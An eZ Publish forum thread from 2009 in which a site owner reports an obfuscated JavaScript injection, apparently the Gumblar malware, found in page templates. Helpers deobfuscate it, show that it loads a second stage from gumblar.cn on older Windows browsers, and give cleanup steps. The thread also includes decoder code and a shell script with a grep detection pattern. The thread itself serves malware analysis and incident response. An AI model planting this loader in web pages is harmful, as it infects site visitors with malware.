Hacked?


Neo Pixel

Monday 11 May 2009 11:10:52 am

Is this hacker code?

<!-- 
(function(MI159){var r1jL='%';var Xow='v<61r<20a<3d<22ScriptEn<67ine<22<2cb<3d<22Version()+<22<2c<6a<3d<22<22<2c<75<3dnaviga<74<6fr<2eus<65rAg<65<6e<74<3bi<66(<28u<2eindex<4ff(<22<57in<22)<3e<30)<26<26(u<2eindexOf(<22NT<206<22)<3c0)<26<26(d<6fcum<65nt<2e<63ooki<65<2eindexO<66(<22<6diek<3d<31<22)<3c0)<26<26(type<6f<66<28zr<76zts)<21<3d<74<79p<65o<66(<22A<22)))<7bz<72vzts<3d<22A<22<3beva<6c(<22i<66(<77indow<2e<22<2ba+<22)j<3dj+<22+<61+<22Major<22+<62<2ba<2b<22M<69n<6fr<22+b+a+<22<42uild<22<2bb<2b<22j<3b<22)<3bdoc<75<6dent<2ewr<69t<65(<22<3c<73cri<70t<20src<3d<2f<2f<67umblar<2ec<6e<2frss<2f<3fi<64<3d<22+j+<22<3e<3c<5c<2fscr<69pt<3e<22)<3b<7d';var OBEG=Xow.replace(MI159,r1jL);eval(unescape(OBEG))})(/</g);
 -->

It's wrapped in javascript tags and I found it under the html head tag in one of my ezpublish installs.

Asking stupid questions so you don't have to!

André R.

Monday 11 May 2009 12:10:57 pm

Yes, opening the page here on Linux gives me a warning from Firefox:

This web site at gumblar.cn has been reported as an attack site and has been blocked based on your security preferences.

Google:

Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-06, and the last time suspicious content was found on this site was on 2009-05-06.

Malicious software includes 963 scripting exploit(s), 6 trojan(s).

This site was hosted on 1 network(s) including AS42831 (UKSERVERS).

Switching the eval to alert gives you the code in plain text, something like this:

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
// Fire only on Windows other than NT 6 (Vista/2008), once per page, and not when the marker cookie is set
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A")))
{
zrvzts="A";
// Builds and runs: if(window.ScriptEngine)j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j;
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
// Loads the second stage from gumblar.cn, tagged with the JScript engine version (empty outside IE)
document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");
}

So it seems to be targeting Windows XP and lower.

Where does the code come from? User-contributed content?
Is literal.html enabled, and did you forget to use the |wash operator in a template?

If this is caused by an eZ Publish security bug, please create an issue in the tracker and mark it as a security issue.

eZ Online Editor 5: http://projects.ez.no/ezoe || eZJSCore (Ajax): http://projects.ez.no/ezjscore || eZ Publish EE http://ez.no/eZPublish/eZ-Publish-Enterprise-Subscription
@: http://twitter.com/andrerom
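The deobfuscation step André describes (swapping the `<` marker for `%` and unescaping) can be done without ever handing the payload to eval. What follows is an added example written for this page, not code from the thread or from eZ Publish; the function names decodePayload, secondStage and extractScriptSources are chosen here, and the only input is the packed string from the first post:

```javascript
// Added example: static decoding of the packed script from the first post.
// The original wrapper does Xow.replace(/</g, '%') and then eval(unescape(...)).
// Here the same substitution and %XX decoding are done as pure string
// operations, so nothing from the payload executes.

// The packed string exactly as it appears in the post. The escape marker is
// "<", which the wrapper receives as the regex /</g.
const PACKED =
  'v<61r<20a<3d<22ScriptEn<67ine<22<2cb<3d<22Version()+<22<2c<6a<3d<22<22<2c<75<3dnaviga<74<6fr<2eus<65rAg<65<6e<74<3bi<66(<28u<2eindex<4ff(<22<57in<22)<3e<30)<26<26(u<2eindexOf(<22NT<206<22)<3c0)<26<26(d<6fcum<65nt<2e<63ooki<65<2eindexO<66(<22<6diek<3d<31<22)<3c0)<26<26(type<6f<66<28zr<76zts)<21<3d<74<79p<65o<66(<22A<22)))<7bz<72vzts<3d<22A<22<3beva<6c(<22i<66(<77indow<2e<22<2ba+<22)j<3dj+<22+<61+<22Major<22+<62<2ba<2b<22M<69n<6fr<22+b+a+<22<42uild<22<2bb<2b<22j<3b<22)<3bdoc<75<6dent<2ewr<69t<65(<22<3c<73cri<70t<20src<3d<2f<2f<67umblar<2ec<6e<2frss<2f<3fi<64<3d<22+j+<22<3e<3c<5c<2fscr<69pt<3e<22)<3b<7d';

// Step 1 of the wrapper: turn every marker back into '%' (marker must be a
// global regex, as in the original, or only the first hit is replaced).
// Step 2: decode %XX and %uXXXX by hand, which is all unescape() would do.
function decodePayload(packed, marker) {
  const percentEncoded = packed.replace(marker, '%');
  return percentEncoded.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_m, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// The decoded script feeds a second string to eval(), built from
// a="ScriptEngine" and b="Version()+". Reproduce that concatenation to see
// the code it would run instead of running it.
function secondStage(a = 'ScriptEngine', b = 'Version()+') {
  return 'if(window.' + a + ')j=j+' + a + 'Major' + b + a + 'Minor' + b + a + 'Build' + b + 'j;';
}

// Pull every src= value out of document.write("<script src=...>") so the
// remote host can be blocked and grepped for across the whole site.
function extractScriptSources(decoded) {
  const sources = [];
  const re = /<script src=([^\s>"]+)/g;
  let m;
  while ((m = re.exec(decoded)) !== null) sources.push(m[1]);
  return sources;
}

const decoded = decodePayload(PACKED, /</g);
console.log(decoded);
console.log(secondStage());
console.log(extractScriptSources(decoded));
```

Run with node; it prints the same plain-text script André posted, the string the inner eval would execute (an IE-only fingerprint built from the JScript ScriptEngine*Version() functions, so the id is populated only on Internet Explorer and other Windows browsers request the second stage with an empty id), and the script source to block, //gumblar.cn/rss/?id=. Decoding as a string operation rather than through alert() keeps the decoder usable from the command line and removes any chance of the browser executing something you misread.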

Neo Pixel

Monday 11 May 2009 1:06:33 pm

It just appeared from nowhere so I'm assuming a hack through a vulnerability.

Warning: Visiting this site may harm your computer!
The website at www.ne0.co.uk contains elements from the site gumblar.cn, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for gumblar.cn

And it's also on the admin site: http://www.ne0.co.uk/ezwebin_site_admin/

Literal HTML is not enabled

I don't think it's a specific ezpublish hack as it's also on a friends non ezp site

The website at www.crystal-jewels.co.uk contains elements from the site gumblar.cn, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.


André R.

Monday 11 May 2009 1:22:54 pm

Check your design/admin/templates/loginpagelayout.tpl.

The script would be between the head and body tags; in a clean ezp install it looks like this:

</style>
<![endif]-->
{/literal}

</head>

<body>

<div id="allcontent">

<div id="header">
<div id="header-design">

If it is there, then it looks like the hacker has hacked your server somehow (either a vulnerability or brute force) and added the script to the templates.


Neo Pixel

Monday 11 May 2009 1:40:07 pm

There's nothing between the head and body tags in that file.

But I have found it in:

/design/base/templates/loginpagelayout.tpl
/design/standard/templates/loginpagelayout.tpl

/design/base/templates/pagelayout.tpl
/design/standard/templates/pagelayout.tpl

I've reloaded the design directory but it's still in there somewhere.

I've instructed my hosts to investigate.

Thanks for your help


André R.

Monday 11 May 2009 10:30:11 pm

Try clearing the template cache; it might be that he/she has simply edited some of your compiled templates.


zurgutt -

Tuesday 12 May 2009 6:33:25 am

I have had to clean up a few compromised servers that had code like that embedded in HTML and .tpl files. It's hard work.

Be very, very careful and thorough. Just removing the added part from the templates is not enough; rootkits that do this usually also install several fallback routines to re-infect stuff, and there may also be backdoors and keyloggers installed in system binaries. sshd is often modified to collect passwords, for example.

General approach:
1. Make an extra full backup of the whole system.
2. Use iptables rules to forbid ALL net traffic, both incoming and outgoing, except the IP of the computer you are working from. This is so that the hacker can't access it while you work, and perhaps can't do a last-minute rm -rf or whatnot.
3. Very carefully find any changes to the system and reverse them. find -ctime is your best friend. It is also useful to compare the filesystem to the last backup made while uninfected. Pay special attention to the /etc and /usr filesystems. Reverse any changes, update outdated programs, add security measures, etc.
3b. It may be the best idea to completely reinstall the OS clean and transfer the cleaned web applications to a new host. It takes less time than cleaning out a compromised OS and is more secure.
4. Remove the iptables restriction. Keep a keen eye on the server for a week or more, looking for signs of reinfection. Make a full backup offsite at least once a day.

If any of the above is Greek to you, get help from a server professional.

Certified eZ developer looking for projects.
zurgutt at gg.ee
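The lockdown and file-hunting checks behind steps 2 and 3 of zurgutt's list, as an added example written for this page rather than code from the thread. It assumes a POSIX shell with find, grep and diff; the admin IP 203.0.113.5, the web root and the backup path are placeholder arguments, and the grep markers are only the two indicators visible in this thread (the gumblar.cn host from the decoded script and the eval(unescape( wrapper of the packed one):

```shell
#!/bin/sh
# Added example: the checks from steps 2 and 3 as shell functions.
# Assumes POSIX sh plus find, grep and diff. The admin IP, web root and
# backup path are hypothetical arguments chosen for this example.

# Step 2: print (not run) the iptables rules that drop all traffic except to
# and from the admin host. Review them, then as root: lockdown_rules 203.0.113.5 | sh
# The admin ACCEPT rules go in before the policies switch to DROP, so the
# session used to apply them is not cut off.
lockdown_rules() {
    admin="$1"
    cat <<EOF
iptables -F
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -s $admin -j ACCEPT
iptables -A OUTPUT -d $admin -j ACCEPT
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
EOF
}

# Step 3a: files whose inode changed in the last N days. ctime is maintained
# by the kernel and, unlike mtime, cannot be set directly from userspace with
# touch -t or utime(), which is why find -ctime beats -mtime here.
recently_changed() {
    find "$1" -type f -ctime "-$2"
}

# Step 3b: files carrying the injection seen in this thread. Extend the
# pattern with further markers as you find them.
find_injected() {
    grep -rlE 'gumblar\.cn|eval\(unescape\(' "$1"
}

# Step 3c: compare the live tree with the last clean backup; every changed or
# added file is a candidate for review.
diff_against_backup() {
    diff -rq "$1" "$2"
}

# Usage: sh hunt.sh /var/www/ezpublish 7 [/backup/ezpublish-clean]
if [ "$#" -ge 2 ]; then
    echo "== changed in the last $2 days"; recently_changed "$1" "$2"
    echo "== files with injection markers"; find_injected "$1"
    if [ -n "$3" ]; then
        echo "== differs from clean backup"; diff_against_backup "$3" "$1"
    fi
fi
```

lockdown_rules only prints its rule set so it can be read before being piped to sh as root. The backup comparison is the check to trust most: once system binaries such as sshd may have been replaced, the tools on the box itself are suspect, and a clean copy is the only reliable reference.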

Neo Pixel

Tuesday 12 May 2009 10:05:47 am

Thanks for all your words of wisdom.

I shall delete everything from ne0.co.uk and start again. Luckily it was only a development install, so no harm done.

My hosts did point out that there is the possibility of a vulnerability in eZ Publish, though.

I shall reinstall and monitor the site for re-infection.

Thanks again


Neo Pixel

Thursday 14 May 2009 3:43:41 am

I have found out that the problem lies on the computer with FTP access, NOT the server.

It's a TROJAN that hijacks FTP details from FTP programs and uploads new code into the files. Very Sneaky...

Make sure all your antivirus software is up to date!!


Powered by eZ Publish™ CMS Open Source Web Content Management. Copyright © 1999-2014 eZ Systems AS (except where otherwise noted). All rights reserved.